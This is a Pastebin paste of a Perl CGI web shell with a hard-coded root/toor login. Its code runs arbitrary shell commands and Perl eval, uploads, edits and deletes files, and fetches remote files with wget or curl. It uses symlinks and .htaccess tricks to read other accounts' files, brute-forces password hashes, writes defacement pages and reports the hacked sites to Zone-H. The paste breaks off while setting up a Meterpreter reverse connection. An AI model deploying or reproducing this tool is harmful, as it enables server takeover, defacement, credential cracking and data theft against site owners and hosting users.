Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ##############################################
- # Login info
- my $Username="root"; #username
- my $Password="toor"; #password
- ##############################################
- #Styl3 : The Shell Color
- #You Can Change it Like You Want
- #Like This : #990000| #00FF00 | #FFFFFF | #008000
- ##############################################
- our $Color_1="#990000"; # The Main Color
- our $Color_2="#666"; # The Box Color
- our $Color_3="#000000"; # The background color
- our $Color_4="#ffffff"; # The Input Font Color
- our $Color_5="#333333"; # The textarea Color
- ##############################################
- # Cgi Staff ....
- # Using Cgi Can Help Us With Html Staf
- # You Can Use GET or POST var like this : '$cgi->param('varname')'
- use CGI::Pretty qw(:all);
- our $cgi=new CGI;
- our (%Cookies,$os,$cmd,$path,$session);
- Main() ;# Main .....
- ##############################################
- #------------- [ Cmd stuff ] ----------------#
- ##############################################
- # I Will use `cmd` and system() for make sur
- # execute the orders
- if (html_var('action') eq "cmd")
- {
- $cmd = html_var('cmd');
- if (html_var('cmd') eq "")
- {
- if ($os eq "Linux")
- {
- $cmd="ls -lia";
- }
- else
- {
- $cmd="dir"
- }
- }
- if (!html_var('help'))
- {
- msg_txt(Cmd($cmd));
- }
- else
- {
- ###################
- # cmd Help
- &text_start;
- if ($os eq "Linux")
- {
- print<<END;
- |------------------------------|-----------------------------------------------|---------------------------------------------|
- | Command | Example | Comment |
- |------------------------------|-----------------------------------------------|---------------------------------------------|
- | zip | zip FileName | Compress the Files Into a ZIP Archive |
- | unzip | unzip FileName | Extract the ZIP Archives |
- | tar -zcf | tar -zcf zz.tar daily | Compress the Files Into a TAR Archive |
- | tar -zxf | tar -zxf zz.tar | Extract the TAR Archives |
- | tar -czvf | tar -czvf FileName.tar.gz FileName | Compress the Files Into a GZ Archive |
- | gzip -d | gzip -d FileName.gz | Extract the GZ Archives |
- | tar -czvf | tar -czvf FileName.tar.gz database | Compress the Files Into SQL Archive |
- | tar -zxvf | tar -zxvf FileName.tar.gz | Extract the Database Files SQL |
- | tar -czvf | tar -czvf FileName.tar.gz NewFile | Compress the Folders Into a tar.gz Archive |
- | ls | ls /home | View the files name in the directory |
- | ls -la | ls -la /home | View Files And Folders in hidden files |
- | pwd | pwd | Show the Current Path |
- | ; | ls;pwd | Combine the Commands |
- | wget | wget http://site.com/file.zip | Get file from URL Using Wget Command |
- | curl -o | curl -o http://site.com/file.zip | Get file from URL Using curl -o Command |
- | lynx -source | lynx -source http://site.com/file.zip| Get file from URL Using lynx -source Command|
- | get | get http://site.com/file.zip | Get file from URL Using get Command |
- | history | history | Show All Previous Commands that you Executed|
- | mkdir | mkdir /myNewDir | make a new Directory in the server |
- | rm | rm file | Deleting Files |
- | rm -r | rm -r myDirectory | Deleting Directory and it's Files |
- | edit | edit myFile | Edit a file using text editer |
- | who | who | who's Connected to the server |
- | cd | cd /home/user | Enter the Selected Path |
- | cd ../ | cd ../ | Go To Upper Directory |
- | mv | mv myFile1 /home/myFile2 | Move And Rename The File |
- | find | find myFile | Looking for a file or folder |
- | ./ | ./localroot | Execute the Executable file |
- | sh | sh localroot | Execute the shell Programming Code |
- | uname -a | uname -a | View The Server Kernel Information |
- | * | rm * | Execute the Command for all |
- | man | man ls | Help About ls Command |
- | touch | touch myFile | Create A new File |
- | gcc | gcc myFile1 -o myFile2 | Convert to Binary Executable File |
- | cat | cat myFile | Read the File contents |
- | more | more myFile | Read the File easily if it's larg |
- | pico | pico myFile | Edit File Using Pico Text Editer |
- | perl | Perl myFile.pl | Execute the Perl Scripts |
- | ln | ln -s /home/myFile myLink | Make a link to the file |
- | grep | grep myFile myText | Look for the Text in the File |
- | chmod | chmod 755 myDirectory | Change the permission to Files Or Folders |
- | chown | chown root myFile | Change the File Owner |
- | chgrp | chgrp root myFile | Change The File Group |
- | clear | clear | Clear the Screen |
- | cmp | cmp myFile1 myFile2 | Compare the Tow Files |
- | crypt | crypt myFile | To Encrypt myFile |
- | csplit | csplit myFile | Spread the File Into pieces |
- |------------------------------|-----------------------------------------------|---------------------------------------------|
- END
- }
- else
- {
- print<<END;
- |------------------------------|-----------------------------------------------|---------------------------------------------|
- | Command | Example | Comment |
- |------------------------------|-----------------------------------------------|---------------------------------------------|
- | cd | cd c:/ | Enter the Selected Path |
- | mkdir | mkdir c:/myNewDir | make a new Directory in the server |
- | ver | ver | View The Server version Information |
- | whoami | whoami | get user name and group information |
- | DATE | DATE | Displays or sets the date |
- | DEL | DEL file.txt | Deletes one or more files |
- | DIR | DIR | Displays a list of files and subdirectories |
- | FIND | FIND "user" | Searches for a text string in a file |
- | FORMAT | FORMAT c | Formats a disk |
- | HELP | HELP | Provides Help information |
- | MD | MD foldername | Creates a directory |
- | PRINT | PRINT txt.txt | Prints a text file |
- | RENAME | RENAME txt.txt file.txt | Renames a file or files |
- | RMDIR | RMDIR dir | Removes a directory |
- |------------------------------|-----------------------------------------------|---------------------------------------------|
- END
- }
- }
- &text_end;
- }
- ##############################################
- #------------ [ Upload File ] ---------------#
- ##############################################
- if (html_var('action') eq "upload")
- {
- &text_start;
- if ($cgi->param('fileme'))
- {
- print "[+] Uploading File ....".$cgi->param('fileme');
- if (writable($path) eq 1)
- {
- my $filename = $cgi->param("fileme");
- my $upload_filehandle = $cgi->upload("fileme");
- open ( UPLOADFILE, ">$filename" ) or print "$!";
- binmode UPLOADFILE;
- while ( <$upload_filehandle> )
- {
- print UPLOADFILE;
- }
- close UPLOADFILE;
- if (-e $filename)
- {
- print " Upload Succses";
- }
- else
- {
- print " Error ...";
- }
- }
- else
- {
- print "[-] The Folder ".$path." is Not writable";
- }
- }
- else
- {
- print "[-] Error ...Pleas Select A File To Upload \n";
- }
- &text_end;
- }
- ##############################################
- #-------------- [ File Get ] ----------------#
- ##############################################
- # This Work on Linux only :)
- if (html_var('action') eq "fileget")
- {
- my $write =writable($path);
- if ($write eq 1)
- {
- my $get_type=html_var('getType');
- my $url_ =html_var('fileUrl');
- if ($os eq "Linux")
- {
- Cmd("$get_type $url_");
- # Get's File Name
- msg_txt("[+] Getting File :$get_type $file ....$RE...\n");
- }
- else
- {
- dont_work();
- }
- }
- else
- {
- msg_txt("[-] The Folder ".$path." is Not writable");
- }
- }
- ##############################################
- #------------ [ Rename File ] ---------------#
- ##############################################
- if (html_var('action') eq "RenameFile")
- {
- &text_start;
- rename(html_var('RenameFile_a'),html_var('RenameFile_b')) or my $err =1 ;
- if ($err eq 1)
- {
- print "[-] Error...$!\n";
- }
- else
- {
- print "[+] The File Was Renamed ....Ok\n";
- }
- &text_end;
- }
- ##############################################
- #------------ [ Delete File ] ---------------#
- ##############################################
- if (html_var('action') eq "deletefile")
- {
- &text_start;
- if (html_var('type') eq "file")
- {
- unlink(html_var('delete_file')) or $err=1;
- if ($err eq 1)
- {
- print "[-] Error ....$!\n";
- }
- else
- {
- if (-e html_var('delete_file'))
- {
- print "[+] I Can't Delete That File";
- }
- else
- {
- print "[+] The File Was Deleted ....Ok";
- }
- }
- }
- else
- {
- ##############################################
- #----------- [ Delete Folder ] --------------#
- ##############################################
- rmdir(html_var('delete_file')) or $err=1;
- if ($err eq 1)
- {
- print "[-] I Can't Delete Your Folder (",html_var('delete_file'),") $!";
- }
- else
- {
- if (-e html_var('delete_file'))
- {
- print "[-] I Can't Delete Folder (",html_var('delete_file'),")";
- }
- else
- {
- print "[+] The Folder (",html_var('delete_file'),") is Deleted ....Ok";
- }
- }
- }
- &text_end;
- }
- ##############################################
- #------------- [ Edite file ] ---------------#
- ##############################################
- if (html_var('action') eq "edit")
- {
- if (html_var('save'))
- {
- $filename=html_var('file_path');
- $txt = html_var('file_con');
- $txt = HtmlSpecialChars_rev($txt);
- open (myfile,">$filename");
- print myfile $txt ;
- close (myfile);
- msg_txt("[+] Ok ...File Was Edited");
- }
- else
- {
- open (WRD, html_var('filee')) or $err=1 ;
- if ($err ne 1)
- {
- print '<form name="edite_form" method="POST" action="?id=home" onSubmit="encode(edite_form.file_con);">
- <p align="center">
- <textarea rows="24" name="file_con">';
- while (<WRD>)
- {
- ($word) = split (/,/);
- print HtmlSpecialChars($word);
- }
- close (WRD);
- $s=html_var('filee');
- $s=encode_base64($s);
- print "
- </textarea><br><input type=\"hidden\" name=\"file_path\" value=\"$s\"><input type=\"hidden\" name=\"action\" value=\"ZWRpdA==\">
- <input type='submit' name='save' value='Save'></form>
- ";
- }
- else
- {
- msg_txt("[-] File not found ". html_var('filee'). "\n");
- }
- }
- }
- ##############################################
- #------------- [ Copy File ] ----------------#
- ##############################################
- if (html_var('action') eq "copy")
- {
- &text_start;
- use File::Copy;
- copy(html_var('copy_a'),html_var('copy_b')) or my $err=1;
- if ($err eq 1)
- {
- print "[-] Copy File Was failed: $!\n"
- }
- else
- {
- if (-e html_var('copy_b'))
- {
- print "[+] The File was copied \n";
- }
- else
- {
- print "[-] Error The File Was not copied \n";
- }
- }
- &text_end;
- }
- ##############################################
- #------------ [ Create Folder ] -------------#
- ##############################################
- if (html_var('action') eq "mkdir")
- {
- my $write =writable($path);
- if ($write eq 1)
- {
- mkdir(html_var('foldername'));
- if (-e html_var('foldername'))
- {
- msg_txt("[+] Create Folder (".html_var('foldername').") ....Ok");
- }
- else
- {
- msg_txt("[-] Errot Can't Create Folder (".html_var('foldername').")");
- }
- }
- else
- {
- msg_txt("[-] The Folder ".$path." is Not writable");
- }
- }
- ##############################################
- #---------------- [ unZiP ] -----------------#
- ##############################################
- if (html_var('action') eq "unzip")
- {
- my $write =writable($path);
- if ($write eq 1)
- {
- if ($os eq "Linux")
- {
- my $unzipname=html_var('unzipname');
- my $txt_cm=Cmd("unzip $unzipname");
- msg_txt("[+] Unzip zipfile ($unzipname) ....Ok\n $txt_cm");
- }
- else
- {
- dont_work();
- }
- }
- else
- {
- msg_txt("[-] The Folder ".$path." is Not writable");
- }
- }
- ##############################################
- #----------- [ Users & Domains ] ------------#
- ##############################################
- if (html_var('action') eq "user_domin")
- {
- if ($os eq "Linux")
- {
- &text_start;
- open (d0mains, '/etc/named.conf') or my $err=1;
- my @kr = <d0mains>;
- close d0mains;
- if ($err)
- {
- print ('C0uldn\'t GET it , Sorry');
- }
- else
- {
- print 'Here is All Domains & Users :';}
- foreach my $one (@kr)
- {
- if($one =~ m/.*?zone "(.*?)" {/)
- {
- my $filename= "/etc/valiases/".$1;
- my $owner = getpwuid((stat($filename))[4]);
- print ''.$1.' : '.$owner.'';
- }
- }
- }
- else
- {
- dont_work();
- }
- }
- ##############################################
- #------------- [ Read file ] ----------------#
- ##############################################
- my $File=html_var('read');
- if (html_var('action') eq "read")
- {
- if (html_var('type') eq "perl")
- {
- &text_start;
- open (WRD, $File) or print "[-] File not found ", $File, "\n" ;
- while (<WRD>)
- {
- my ($word) = split (/,/);
- print HtmlSpecialChars($word);
- }
- close (WRD);
- &text_end;
- }
- else
- {
- ##############################################
- #-------------- [ symlink ] -----------------#
- ##############################################
- #note: this dont work on windows :(
- &text_start;
- if ($os eq "Linux")
- {
- print "[+] Symlink file ($File)...Ok File Path is : $path/LaZ0rd.txt";
- symlink ("$File","LaZ0rd.txt");
- }
- else
- {
- print "[-] I am sorry But symlink dont Work on windows";
- }
- &text_end;
- }
- }
- ##############################################
- #----------- [ Server Shortcut ]-------------#
- ##############################################
- if (html_var('action') eq "genServ")
- {
- my $write =writable($path);
- if ($write eq 1)
- {
- if ($os eq "Linux")
- {
- my $filename=html_var('tool');
- my $txt_cm=Cmd("ln -s / $filename");
- if (-e $filename)
- {
- msg_txt("[+] Creating Server Shortcut ....Ok\n");
- }
- else
- {
- msg_txt("[-] Creating Server Shortcut ....Error\n");
- }
- }
- else
- {
- dont_work();
- }
- }
- else
- {
- msg_txt("[-] The Folder ".$path." is Not writable");
- }
- }
- ##############################################
- #------------- [ Finde 777 ] ---------------#
- ##############################################
- if (html_var('action') eq "777")
- {
- if ($os eq "Linux")
- {
- &text_start;
- use File::Find;
- my ($mode,$find);
- find (\&wanted, html_var('folder_f'));
- sub wanted
- {
- if ( -d $File::Find::name )
- {
- $mode = (stat($File::Find::name))[2];
- $mode = sprintf "%04o", $mode & 07777;
- if ($mode == 777)
- {
- print "[+] This Folder mode Is $mode : $File::Find::name \n" ;
- $find=1;
- }
- }
- }
- if ($find ne 1)
- {
- print "I Could not Find 777 Folder In ",html_var('folder_f');
- }
- &text_end;
- }
- else
- {
- dont_work();
- }
- }
- ##############################################
- #-------------- [ Chmod File ] --------------#
- ##############################################
- if (html_var('action') eq "chmod")
- {
- if ($os eq "Linux")
- {
- my $file=html_var('file');
- chmod(html_var('nu'),html_var('file'));
- msg_txt("[+] chomd file ($file) ....Ok\n");
- }
- else
- {
- dont_work();
- }
- }
- ##############################################
- #------------- [ Forbidden ] ---------------#
- ##############################################
- if (html_var('action') eq "for")
- {
- &text_start;
- my $filename=".htaccess";
- my $hta =html_var('403');
- my $htaccess;
- if ($hta eq "DirectoryIndex")
- {
- $htaccess="DirectoryIndex LaZ0rD.txt";
- }
- elsif ($hta eq "HeaderName")
- {
- $htaccess=" HeaderName LaZ0rD.txt";
- }
- elsif ($hta eq "TXT")
- {
- $htaccess=" Options Indexes FollowSymLinks
- addType txt .php
- AddHandler txt .php";
- }
- elsif ($hta eq "404")
- {
- $htaccess=" ErrorDocument 404 /404.html
- 404.html = Symlinked LaZ0rD.txt";
- }
- elsif ($hta eq "ReadmeName")
- {
- $htaccess="ReadmeName LaZ0rD.txt";
- }
- elsif ($hta eq "footerName")
- {
- $htaccess="footerName LaZ0rD.txt";
- }
- my $write =writable($path);
- if ($write eq 1)
- {
- open (myfile,">>$filename");
- print myfile $htaccess;
- close (myfile);
- if (-e $filename)
- {
- print "[+] Creating htaccess File ....Ok\n";
- print "[+] Now You Can Symlink Your File Use 'LaZ0rD.txt' As File Name\n";
- }
- else
- {
- print "[-] Creating htaccess File ....Error\n[-]sorry 0_o";
- }
- }
- else
- {
- msg_txt("[-] The Folder ".$path." is Not writable");
- }
- &text_end;
- }
- ##############################################
- #------------- [ Eval Code ] ---------------#
- ##############################################
- if (html_var('action') eq "eval")
- {
- &text_start;
- eval(html_var('stringtool'));# execute The Perl Code
- &text_end;
- }
- ##############################################
- #--------------- [ encrypt ]-----------------#
- ##############################################
- if (html_var('action') eq "enc")
- {
- &text_start;
- my $text_enc=html_var('stringtool');
- use Digest;
- my $digest;
- my $md5 = Digest->new("MD5");
- my $sha1 = Digest->new("SHA-1");
- my $sha256 = Digest->new("SHA-256");
- my $sha384 = Digest->new("SHA-384");
- my $sha512 = Digest->new("SHA-512");
- # md5
- print "[+] Md5 :";
- my $md_5=$md5->add($text_enc);
- print $digest = $md_5->hexdigest;
- print "\n";
- #sha1
- print "[+] Sha1 :";
- my $sha_1=$sha1->add($text_enc);
- print $digest = $sha_1->hexdigest;
- print "\n";
- #sha256
- print "[+] Sha256 :";
- my $sha_256=$sha256->add($text_enc);
- print $digest = $sha_256->hexdigest;
- print "\n";
- #sha384
- print "[+] Sha384 :";
- my $sha_384=$sha384->add($text_enc);
- print $digest = $sha_384->hexdigest;
- print "\n";
- #sha384
- print "[+] Sha512 :";
- my $sha_512=$sha512->add($text_enc);
- print $digest = $sha_512->hexdigest;
- print "\n";
- #Base64
- print "[+] Base64 :";
- use MIME::Base64;
- print my $Base64 = encode_base64($text_enc);
- #hex
- print "[+] hex :";
- my $myString=$text_enc;
- my @myArray=unpack('C*', $myString);
- my $myStringHex = '';
- foreach my $c (@myArray)
- {
- $myStringHex .= "" . sprintf ("%lx", $c);
- }
- print "0x",$myStringHex;
- print "\n";
- # length
- print "[+] length :";
- print length($text_enc);
- print "\n";
- &text_end;
- }
- ##############################################
- #--------------- [ analyze ]-----------------#
- ##############################################
- if (html_var('action') eq "analyze")
- {
- &text_start;
- my $hash=html_var('stringtool');
- if (substr($hash,0,3) eq '$H$')
- {
- print "[+] This Hash : ".$hash." could be MD5(Wordpress) Hash\n";
- }
- elsif(substr($hash,0,3) eq '$1$')
- {
- print "[+] This Hash : ".$hash." could be MD5(UNIX) Hash\n";
- }
- elsif(substr($hash,0,3) eq '$P$')
- {
- print "[+] This Hash : ".$hash." could be MD5(Wordpress) Hash\n";
- }
- elsif(substr($hash,0,6) eq '$apr1$')
- {
- print "[+] This Hash : ".$hash." could be MD5(ARP) Hash\n";
- }
- elsif(substr($hash,0,3) eq '$5$')
- {
- print "[+] This Hash : ".$hash." could be SHA256(UNIX) Hash\n";
- }
- elsif(substr($hash,0,3) eq '$6$')
- {
- print "[+] This Hash : ".$hash." could be SHA512(UNIX) Hash\n";
- }
- elsif(substr($hash,0,1) eq '*' and length($hash) eq 41)
- {
- print "[+] This Hash : ".$hash." could be MySQL V5.3.x Hash\n";
- }
- elsif (length($hash) eq 32 and ishex($hash))
- {
- print "[+] This Hash : ".$hash." could be MD5 Hash\n";
- print "[+] This Hash : ".$hash." could be MD4 Hash\n";
- print "[+] This Hash : ".$hash." could be MD2 Hash\n";
- print "[+] This Hash : ".$hash." could be eMule Hash\n";
- }
- elsif (length($hash) eq 4 and ishex($hash))
- {
- print "[+] This Hash : ".$hash." could be CRC-16 Hash\n";
- print "[+] This Hash : ".$hash." could be CRC-16-CCITT Hash\n";
- print "[+] This Hash : ".$hash." could be FCS-16 Hash\n";
- }
- elsif(length($hash) eq 13)
- {
- print "[+] This Hash : ".$hash." could be DES Hash\n";
- }
- elsif (length($hash) eq 16 and ishex($hash))
- {
- print "[+] This Hash : ".$hash." could be MYSQL Hash\n";
- }
- elsif(length($hash) eq 40 and ishex($hash))
- {
- print "[+] This Hash : ".$hash." could be MYSQL5 Hash\n";
- print "[+] This Hash : ".$hash." could be SHA0 Hash\n";
- print "[+] This Hash : ".$hash." could be SHA1 Hash\n";
- }
- elsif(length($hash) eq 56)
- {
- print "[+] This Hash : ".$hash." could be SHA224 Hash\n";
- }
- elsif(length($hash) eq 64)
- {
- print "[+] This Hash : ".$hash." could be SHA256 Hash\n";
- }
- elsif(length($hash) eq 96)
- {
- print "[+] This Hash : ".$hash." could be SHA384 Hash\n";
- }
- elsif(length($hash) eq 128)
- {
- print "[+] This Hash : ".$hash." could be SHA512 Hash\n";
- }
- else
- {
- print "[-] I Am sorry But I Don't Know This $hash\n";
- }
- &text_end;
- }
- ##############################################
- #------------ [ Download File]---------------#
- ##############################################
- sub download
- {
- my $SendFile=shift;
- if(open(SENDFILE, $SendFile)) # file opened for reading
- {
- $FileSize = (stat($SendFile))[7];
- ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
- print "Content-Type: application/x-unknown\n";
- print "Content-Length: $FileSize\n";
- print "Content-Disposition: attachment; filename=$1\n\n";
- print while(<SENDFILE>);
- close(SENDFILE);
- exit();
- }
- else
- {
- print "Content-Type: text/html\n\n";
- style();
- java_code();
- msg_txt("[-] Error....I Can't Find file $SendFile");
- }
- }
- ##############################################
- #----------- [ Fast Defacement ] -----------#
- ##############################################
- if (html_var('action') eq "mass")
- {
- my $massFileName=html_var('massFileName');
- my $write =writable($path);
- if ($write eq 1)
- {
- open (myfile,">>$massFileName");
- print myfile html_var('massIndex');
- close (myfile);
- if (-e html_var('massFileName'))
- {
- msg_txt("[+] Creating $massFileName ....Ok\n");
- }
- else
- {
- msg_txt("[-] Creating $massFileName ....Error\n[-] sorry 0_o");
- }
- }
- else
- {
- msg_txt("[-] The Folder ".$path." is Not writable");
- }
- }
- ###########################################################
- ###########################################################
- ###------------------ [ Brut3-F0rc3 ] ------------------###
- ###########################################################
- ###########################################################
- use Digest;
- use Digest::MD5 qw(md5_hex);
- use Digest::SHA1 qw(sha1_hex);
- my ($alpha,$exit,$t,$CharSet,$no,@RawString,$cnt,$ret,$hash,$exi,$file,$be,$mincount,$maxcount,$file_,$s);
- if ($cgi->param('action') eq "Brute-Force")
- {
- # Hashz Brut3-F0rc3 CraCker
- &text_start;
- print "###########################################################\n";
- print "###########################################################\n";
- print "###----------- [ Hashz Brut3-F0rc3 CraCker ] -----------###\n";
- print "###########################################################\n";
- print "###########################################################\n";
- print "[+] Welcame To Hashz Brut3-F0rc3 CraCker... For Hash'z G33k'z 0nly\n";
- print "[+] C0ded By LaZ0rD SyR!an .... \n";
- my $user_hash = $cgi->param('hash');
- my $be = $cgi->param('char');
- my $mincount = $cgi->param('mincount');
- my $maxcount = $cgi->param('maxcount');
- my $type = $cgi->param('type');
- if ($type eq "How To Use")
- {
- print "[?] You Can Crack any [MD5 ,SHA1,SHA-256,SHA-384]\n";
- print "[?] Your Hash : Your Hash it must be Valid hash \n";
- print "[?] The Chars : It Can Be [aAdx] \n";
- print " a = {'a','b','c',...}\n";
- print " A = {'A','B','C',...}\n";
- print " d = {'1','2','3',...}\n";
- print " x = {'!','\','*',...}\n";
- print "[?] Mini count and Max count is the length Which You Want to Search In :) \n";
- &text_end;
- $exit=1;
- }
- #############
- # Chars Staff
- if ($be=~"a")
- {
- $alpha = "abcdefghijklmnopqrstuvwxyz";
- }
- if ($be=~"A")
- {
- $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
- }
- if ($be=~"d")
- {
- $alpha = $alpha."1234567890";
- }
- if ($be=~"x")
- {
- $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";
- }
- if ($exit ne 1)
- {
- print "[+] Using Chars : '",$alpha,"'\n";
- }
- #############
- # Hash Check
- if ($type eq "MD5")
- {
- if (length($user_hash) != 32 and $exit ne 1)
- {
- print "[-] Sorry but it seems that the MD5 hash is not valid!\n";
- &text_end;
- $exit=1;
- }
- else
- {
- print "[+] Checking your hash : ok ....it's Valid Md5 Hash\n";
- }
- }
- elsif($type eq "SHA1")
- {
- if (length($user_hash) != 40 and $exit ne 1)
- {
- print "[-] Sorry but it seems that the SHA1 hash is not valid!\n";
- &text_end;
- $exit=1;
- }
- else
- {
- print "[+] Checking your hash : ok ....it's Valid SHA1 Hash\n";
- }
- }
- elsif ($type eq "SHA-256")
- {
- if (length($user_hash) != 64 and $exit ne 1)
- {
- print "[-] Sorry but it seems that the SHA-256 hash is not valid!\n";
- &text_end;
- $exit=1;
- }
- else
- {
- print "[+] Checking your hash : ok ....it's Valid SHA-256 Hash\n";
- }
- }
- elsif ($type eq "SHA-384")
- {
- if (length($user_hash) != 96 and $exit ne 1)
- {
- print "[-] Sorry but it seems that the SHA-384 hash is not valid!\n";
- &text_end;
- $exit=1;
- }
- else
- {
- print "[+] Checking your hash : ok ....it's Valid SHA-384 Hash\n";
- }
- }
- else
- {
- if ($exit ne 1)
- {
- print "[-] Sorrt But I can't Use : $type ... because I don't know What it's :( \n";
- &text_end;
- $exit=1;
- }
- }
- if ($exit ne 1)
- {
- print "[+] Using Hash type : $type\n";
- print "[+] Cracking : $user_hash\n";
- }
- #############
- # The Number Of Chars == (length)
- if ($exit ne 1)
- {
- for ($t=$mincount;$t<=$maxcount;$t++)
- {
- Crack ($t);
- }
- }
- #############
- sub Crack{
- $CharSet = $_[0];
- $no=$_[1];
- @RawString = ();
- for (my $i =0;$i<$CharSet;$i++)
- {
- $RawString[$i] = 0;
- }
- do
- {
- for (my $i =0;$i<$CharSet;$i++)
- {
- if ($RawString[$i] > length($alpha)-1)
- {
- if ($i==$CharSet-1)
- {
- $cnt=0;
- return "false";
- }
- $RawString[$i+1]++;
- $RawString[$i]=0;
- }
- }
- $ret = "";
- for (my $i =0;$i<$CharSet;$i++)
- {
- $ret = $ret . substr($alpha,$RawString[$i],1);
- }
- #############
- $hash = _hash($ret);
- $cnt++;
- if ($user_hash eq $hash)
- {
- print "[+] I Have tried '$cnt' Possibility \n####################### [ Password Cracked ] =[ $ret ] #######################\n";
- &text_end;
- $exi = 1;
- return 0;
- }
- $RawString[0]++;
- }while($RawString[$CharSet-1]<length($alpha) or $exi = 1);
- }
- ##########################################################
- sub _hash
- {
- if ($type eq "MD5")
- {
- return md5_hex($_[0]);
- }
- if ($type eq "SHA1")
- {
- return sha1_hex($_[0]);
- }
- if ($type eq "SHA-256")
- {
- my $sha256 = Digest->new("SHA-256");
- my $sha_256=$sha256->add($_[0]);
- my $digest = $sha_256->hexdigest;
- return $digest;
- }
- if ($type eq "SHA-384")
- {
- my $SHA384 = Digest->new("SHA-384");
- my $sha_384=$SHA384->add($_[0]);
- my $digest = $sha_384->hexdigest;
- return $digest;
- }
- }
- }
- ##########################################################
- # Wordz List Creator
- if ($cgi->param('action') eq "word")
- {
- &text_start;
- print "###########################################################\n";
- print "###########################################################\n";
- print "###-------------- [ Wordz List Creator ] ---------------###\n";
- print "###########################################################\n";
- print "###########################################################\n";
- print "[+] Welcame To Wordz List Creator...\n";
- print "[+] C0ded By LaZ0rD SyR!an .... \n";
- $file=$cgi->param('file');
- $be = $cgi->param('char');
- $mincount = $cgi->param('mincount');
- $maxcount = $cgi->param('maxcount');
- $file_=open (myfile,">>$file");
- ##########################################################
- # Chars Staff
- if ($be=~"a")
- {
- $alpha = "abcdefghijklmnopqrstuvwxyz";
- }
- if ($be=~"A")
- {
- $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
- }
- if ($be=~"d")
- {
- $alpha = $alpha."1234567890";
- }
- if ($be=~"x")
- {
- $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";
- }
- print "[+] Using Chars : '",$alpha,"'\n";
- ##########################################################
- # The Number Of Chars == (length)
- for ($t=$mincount;$t<=$maxcount;$t++)
- {
- $s = generate ($t);
- $no = $no + $s;
- }
- ##########################################################
- sub generate{
- $CharSet = shift;
- @RawString = ();
- for (my $i =0;$i<$CharSet;$i++)
- {
- $RawString[$i] = 0;
- }
- do
- {
- for (my $i =0;$i<$CharSet;$i++)
- {
- if ($RawString[$i] > length($alpha)-1)
- {
- if ($i==$CharSet-1)
- {
- $cnt=0;
- return "false";
- }
- $RawString[$i+1]++;
- $RawString[$i]=0;
- }
- }
- $ret = "";
- for (my $i =0;$i<$CharSet;$i++)
- {
- $ret = $ret . substr($alpha,$RawString[$i],1);
- }
- $hash = $ret;
- $cnt++;
- $no++;
- print myfile $ret,"\n" ;
- $RawString[0]++;
- }while($RawString[$CharSet-1]<length($alpha));
- return $no;
- }
- print "[+] I Am Done The File ($file) Has been Created ... With ($no) Possibility :)";
- &text_end;
- close (myfile);
- }
- ##############################################
- #----------- [ Zone-h sender ] -----------#
- ##############################################
- if (html_var('action') eq "zone-h")
- {
- $hacker = html_var('hacker');
- if (html_var('list') eq "")
- {
- print "Enter Your Hacked WebSites List (HaCked By $hacker): ";
- print <<END;
- <form name="list" method="POST" action= "?id=home" onSubmit="encode(list.hacker);">
- <input type="hidden" name="action" value="em9uZS1o">
- <input type="hidden" name="hacker" value="$hacker">
- <p align="center">
- <textarea rows="24" name="list"></textarea>
- <input type='submit' value='Sende'>
- </form>
- END
- }else{
- text_start();
- $sit = $cgi->param('list');
- @site = split(/\n/,$sit);
- $b = scalar(@site);
- $a = 0 ;
- while ($a ne $b)
- {
- #$site[$a]=chomp ($site[$a]);
- if($site[$a] =~ /http/) { substr($site[$a], 0, 7) =""; }
- print "[+] Postalandi $site[$a]";
- use IO::Socket::INET;
- $sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or print "Filed ....I Can't Access To WWW.Zone-H.Com";
- print $sock "POST /component/option,com_notify/Itemid,89/task,single/ HTTP/1.0\r\n";
- print $sock "Accept: */*\r\n";
- print $sock "Referer: http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/\r\n";
- print $sock "Accept-Language: pt-br\r\n";
- print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
- print $sock "Connection: Keep-Alive\r\n";
- print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
- print $sock "Host: www.zone-h.org\r\n";
- $length=length("defacer=$hacker&domain=http%3A%2F%2 F$site[$a]&method=22&reason=5&option=com_notify");
- print $sock "Content-Length: $length\r\n";
- print $sock "Pragma: no-cache\r\n";
- print $sock "\r\n";
- print $sock "defacer=$hacker&domain=http%3A%2F%2F$site[$a]&method=22&reason=5&option=com_notify\r\n";
- close($sock);
- $a =$a +1;
- }
- text_end();
- }
- }
- our ($port,$ip,$meter_p,$filename,$meter_re,$meter_bind,$bind_port,$ip_r,$re_port,$bind_perl1,$bind_perl2,$bind_ruby,$bind_inetd,$bind_c);
- $bind_port = html_var('bind_port');
- $ip_r = html_var('ip_r');
- $re_port = html_var('re_port');
- ##############################################
- #----- [ Meterpreter Revers Connection ] ----#
- ##############################################
- if (html_var('action') eq "meter_revers")
- {
- msg_txt("[+] PHP Meterpreter -> Metasploit Revers Connection ....Ok \n[+]For Connection Go To metasploit : \nmsf>use exploit/multi/handler\nmsf>set payload php/meterpreter/reverse_tcp\nmsf>set LPORT ",html_var('re_port'),"\nmsf>set LHOST ",html_var('ip_r'),"\nmsf>exploit");
- use MIME::Base64;
- $port=html_var('re_port');
- $ip=html_var('ip_r');
